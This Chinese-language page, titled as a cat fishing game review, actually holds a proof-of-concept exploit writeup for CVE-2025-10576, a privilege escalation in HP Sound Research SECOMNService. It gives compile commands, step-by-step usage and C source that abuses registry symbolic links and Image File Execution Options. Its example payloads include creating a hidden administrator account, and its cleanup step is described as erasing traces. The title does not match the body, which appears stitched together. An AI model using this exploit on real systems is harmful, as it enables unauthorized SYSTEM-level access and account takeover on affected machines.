《猫猫钓游记》可爱+收集+钓鱼游戏试玩
2026-06-30
2026-07-01 0
本项目是针对 CVE-2025-10576 漏洞的概念验证(PoC)利用工具。该漏洞影响 HP Sound Research 音频驱动组件的 SECOMNService 服务,由于注册表权限配置不当,允许任何非特权用户在 HKLMSoftwareSoundResearchAPO 路径下创建注册表符号链接,诱导 SECOMNService 服务在系统重启或服务重启时向攻击者控制的注册表路径写入任意内容,从而实现权限提升并执行任意系统命令。

| 属性 | 值 |
|---|---|
| 漏洞编号 | CVE-2025-10576 |
| 影响组件 | HP Sound Research SECOMNService |
| 漏洞类型 | 权限提升 (EoP) |
| 利用方式 | 注册表符号链接 + Image File Execution Options |
| 影响范围 | 特定 HP 消费级/商用级设备 |
REG_OPTION_CREATE_LINK 选项在 HKLMSoftwareSoundResearchAPO 创建指向目标注册表路径的符号链接Image File Execution Options 的 Debugger 键值,将任意命令注入到系统计划任务执行上下文中Consolidator 计划任务触发命令执行使用 Visual Studio 命令行工具编译:
cl.exe /DUNICODE /D_UNICODE soundresearch_poc.c
使用 MinGW-w64 编译:
x86_64-w64-mingw32-gcc -o soundresearch_poc.exe soundresearch_poc.c -ladvapi32 -lntdll
windows.h 头文件)ntdll.dll(提供 NtDeleteKey 系统调用)soundresearch_poc.exe [prepare|exploit|run|cleanup] [命令参数]
创建注册表符号链接,将 HKLMSoftwareSoundResearchAPO 重定向到 HKLMSoftwareMicrosoftWindows NTCurrentVersionImage File Execution Optionswsqmcons.exe:
soundresearch_poc.exe prepare
执行成功后,必须重启系统或重启 SECOMNService 服务才能使符号链接生效。
设置 IFEO 调试器键值,将目标命令注入到 wsqmcons.exe 的调试器中:
soundresearch_poc.exe exploit "whoami /all > C:Windowssoundresearch.txt"
该命令会:
Debugger 值为当前可执行文件路径 + run 子命令 + 目标命令Consolidator 计划任务直接通过工具执行任意命令(通常由 exploit 自动调用):
soundresearch_poc.exe run "net localgroup administrators"
删除所有创建的注册表项和符号链接:
soundresearch_poc.exe cleanup
场景一:查看当前权限
soundresearch_poc.exe exploit "whoami"
场景二:添加管理员用户
soundresearch_poc.exe exploit "net user hacker P@ssw0rd /add && net localgroup administrators hacker /add"
场景三:获取系统信息
soundresearch_poc.exe exploit "systeminfo > C:tempsysinfo.txt"
BOOL prepare(void)
{
wchar_t* linkstr = REGLINK_TARGET; // 目标路径:IFEO
HKEY hlink = NULL; // 删除已存在的键,确保干净状态
RegDeleteTreeW(HKEY_LOCAL_MACHINE, SOUNDRESEARCH_KEY); // 创建注册表符号链接(REG_OPTION_CREATE_LINK 标志)
if(!RegCreateKeyExW(HKEY_LOCAL_MACHINE, SOUNDRESEARCH_KEY, 0, NULL,
REG_OPTION_CREATE_LINK, KEY_WRITE | KEY_READ,
NULL, &hlink, NULL))
{
// 设置 SymbolicLinkValue 值指向目标路径
RegSetValueExW(hlink, REG_SYMLINK_VALUE, 0, REG_LINK,
(void*)linkstr, wcslen(linkstr) * sizeof(wchar_t));
RegCloseKey(hlink);
return TRUE;
}
return FALSE;
}
核心机制:使用 REG_OPTION_CREATE_LINK 配合 REG_LINK 值类型创建注册表符号链接。当服务以 SYSTEM 权限访问 SOUNDRESEARCH_KEY 时,实际会被重定向到 IFEO_KEY 路径。
void cleanup(void)
{
HKEY hlink = NULL; // 打开符号链接并删除(使用 REG_OPTION_OPEN_LINK)
if(!RegOpenKeyExW(HKEY_LOCAL_MACHINE, SOUNDRESEARCH_KEY,
REG_OPTION_OPEN_LINK, DELETE, &hlink))
{
NtDeleteKey(hlink); // 直接删除符号链接键
RegCloseKey(hlink);
} // 删除 IFEO 键
RegDeleteTreeW(HKEY_LOCAL_MACHINE, IFEO_KEY);
}
核心机制:使用 REG_OPTION_OPEN_LINK 打开符号链接本身而非目标路径,通过 NtDeleteKey 删除链接键,彻底清除痕迹。
int main(int argc, char** argv)
{
if(argc < 2) {
printf("Usage: %s [prepare|exploit|run|cleanup] "{command line}"n", argv[0]);
return 1;
}
if(!strcmp(argv[1], "cleanup")) {
cleanup();
return 0;
}
else if(!strcmp(argv[1], "prepare")) {
if(!prepare()) {
printf("Symlink creation failed!n");
return 1;
}
printf("Symlink created! Now restart the machine or SECOMNService service!n");
return 0;
}
else if(!strcmp(argv[1], "exploit")) {
if(argc < 3) {
printf("exploit requires an extra command line argument!n");
return 1;
}
if(!exploit(argv[2])) {
printf("Failed to run the exploit! Check permissions!n");
return 1;
}
printf("Exploit successful! Queue command: "%s"n", argv[2]);
return 0;
}
else if(!strcmp(argv[1], "run")) {
if(argc < 3) {
printf("run requires an extra command line argument!n");
return 1;
}
run(argv[2]);
return 0;
}
printf("Command "%s" not known. Use prepare, exploit, run or cleanup!n", argv[1]);
return 1;
}
核心机制:命令行驱动的控制流程,支持 prepare、exploit、run、cleanup 四个子命令,形成完整的漏洞利用闭环。